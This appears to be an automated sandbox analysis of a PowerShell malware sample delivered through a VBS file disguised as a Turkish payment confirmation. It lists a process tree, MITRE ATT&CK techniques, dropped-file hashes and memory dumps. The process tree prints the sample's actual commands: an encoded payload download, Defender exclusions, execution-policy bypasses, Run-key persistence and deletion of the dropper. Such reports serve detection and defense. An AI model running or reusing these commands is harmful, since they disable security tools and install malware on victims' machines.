      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABvAGIAVAB4AHEAIAA9ACAAKABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApACAAKwAgACcAZABsAGwAMAAxAC4AdAB4AHQAJwApACAAOwAkAHkAZgBrAHAAdAAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABvAGIAVAB4AHEAIAApACAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJAB5AGYAawBwAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AYgBUAHgAcQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAA= -inputFormat xml -outputFormat text
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1120
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
      4⤵
      PID:4364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\\x11.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\\x22.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\igudf.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:380
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
      4⤵
      PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\igudf.ps1

Filesize
1.2MB

MD5
4cae4f09bfc221b0067fa2c7bfee0767

SHA1
ef5e5c14df21ccd2f07dbc7bae34d8a460cc7de3

SHA256
0e7e5c20ff5889875323abe6d7f0a8682b345ec94f29033320eddf3f491308bb

SHA512
faf0b9681306af119fb8c39e32fe4d3b693e80fe0d9120d9afd9e64f862e9e957bee9eee6feaf83cc57ab31bb7714fba61ffab8c65e5967d65fd220d4f81343a

Download Submit
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\x11.ps1

Filesize
402B

MD5
9896f0f17ce1d5b9c833c607a27e60a6

SHA1
77cbfdd380fb7faa815d278c9c92aa770ec9ec52

SHA256
a889984f728732d49f5c81012d25331a651549b8a356e71ab1c1cdc21c688049

SHA512
29234fde4a05f8673a08fdfe2f0c34dff4a6b9f782ba34533653fdd9fcf4efd465ae5d007cfbfac31f848209199d51b2fa78f617a89267f1c9cb558642e2bef4

Download Submit
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\x22.ps1

Filesize
406B

MD5
a44cdfac716a84a110970742d46ee11b

SHA1
b8d53507b00bf57afd20a60f38fb80f0c4a9c63b

SHA256
d7557231fe05df4b9a64c0909660bea009b7de577c5da7460e5975c97c584bbc

SHA512
d869cfa05f6017345c2b24cc759aa5ac6ec7fe0a72bee8da7416ea988f401d250b4b281a3ae49b5ebecaccc44f8015d449b96d6f4de7e7d58bb322884a042376

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b138471334bb50e38b7fb5cb817e31b7

SHA1
bcdaeadb974f3caf0861c6b9a72f90951d51abf2

SHA256
4822a32741638f6766340d9f422f4cd1462f11db711e3afedae836a31e4d0d5d

SHA512
87c00a67e63aacebb55966ac4a7f9c54f90b808393ea01192df3b5e30b1f50e15d2f5e0714e60cb7cad1d9a412beae24ceb19efa10941a1d9dfc2d210d1aec03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
57359e8a52af5b5eb6f81945c98fd001

SHA1
bd0fe9b90d9683c5bb7f45f794a230a271acbb91

SHA256
3367baf6d28d601966ec6b2905587a1b8372d18f11a316ecf18e373f12c71a1a

SHA512
aa47fee216b36180327423051b6deb75c637c43c79bc9391f10683db34692eaf27b18e2a42aab2c0a5da87fe1c21b9a12ad5cfa10aacdd543c27dec263f52b86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c3380c22af0ad139ff369f535aebbd25

SHA1
eb43b3c73842ee0b6e438b8bf46742ca72419f61

SHA256
3527d86eb35864d6c883e3ffe62474ee7f3d7f99f41b36686e86025e3b28155c

SHA512
d0c017ad1211f5636d3a5e23bea8c3c55b6ceb3cf00fad234df6f8555d6f8c2d88152fdbb4cb5ca43f664abf10ded41c454513fdebe656b3b4ee8ffaeab1fbba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8c8df45971b4c2a095c8d6ce9c8b0d85

SHA1
1922bce27f75c178dc8077a8f71702a3ba52ba0c

SHA256
10eb70af88e2872f17691786e51fdc748c7226032a0527a60ab6bf5d7a7aa82d

SHA512
5df91b5481de9c659fbfccdf338e34dfa7fa500e8501e9b49d7eca983bbe4802d2658bbb6e460ea4b0327fa3f289aa9e030ac7bd2fc7a299a62745e48c75149a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
217d9191dfd67252cef23229676c9eda

SHA1
80d940b01c28e3933b9d68b3e567adc2bac1289f

SHA256
e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133

SHA512
86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqdnxy30.awp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
26B

MD5
d9a6eba20e1a05a18ca853659797ee53

SHA1
7577e5fcd39c3b13406e5af6447ba044a21565d3

SHA256
1596f1f33f95bf2ef8cc5033ee3ec619e07d2872d200eaede983671cc186a952

SHA512
9074b17efb3d6a4d63d7dd8994e4fe771d3019198876acab8e38c310213e2929e15413ab1dd2d1df6d2a73201424aae5aa0c812c5a4a8fe11ef176fdca039a6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
48KB

MD5
57e97e524dac6c5c3fb52d758ba7239a

SHA1
293f28458ad9a1d10d905fdc335a6c9f5d766c7f

SHA256
1f9c28385540f6470a57ae18bc4654f8f54e3436f0ed4e5723634b5841df21de

SHA512
1c6b77613742b7041a3b5f3c8b83a2c9cbd81525d8d5cdcedd5550e76f6c16f9fddcb52675974f0e6582baed5d65f79593a7cc8d959838bd3aee4c8dd86f133b

Download Submit
memory/380-108-0x0000019D5FDF0000-0x0000019D5FDFA000-memory.dmp

Filesize
40KB

Download
memory/4696-24-0x00007FFF769F0000-0x00007FFF774B1000-memory.dmp

Filesize
10.8MB

Download
memory/4696-11-0x00007FFF769F0000-0x00007FFF774B1000-memory.dmp

Filesize
10.8MB

Download
memory/4696-23-0x00007FFF769F3000-0x00007FFF769F5000-memory.dmp

Filesize
8KB

Download
memory/4696-0-0x00007FFF769F3000-0x00007FFF769F5000-memory.dmp

Filesize
8KB

Download
memory/4696-12-0x00007FFF769F0000-0x00007FFF774B1000-memory.dmp

Filesize
10.8MB

Download
memory/4696-96-0x00007FFF769F0000-0x00007FFF774B1000-memory.dmp

Filesize
10.8MB

Download
memory/4696-1-0x0000021F7BF90000-0x0000021F7BFB2000-memory.dmp

Filesize
136KB

Download
memory/4840-39-0x0000025376360000-0x000002537636A000-memory.dmp

Filesize
40KB

Download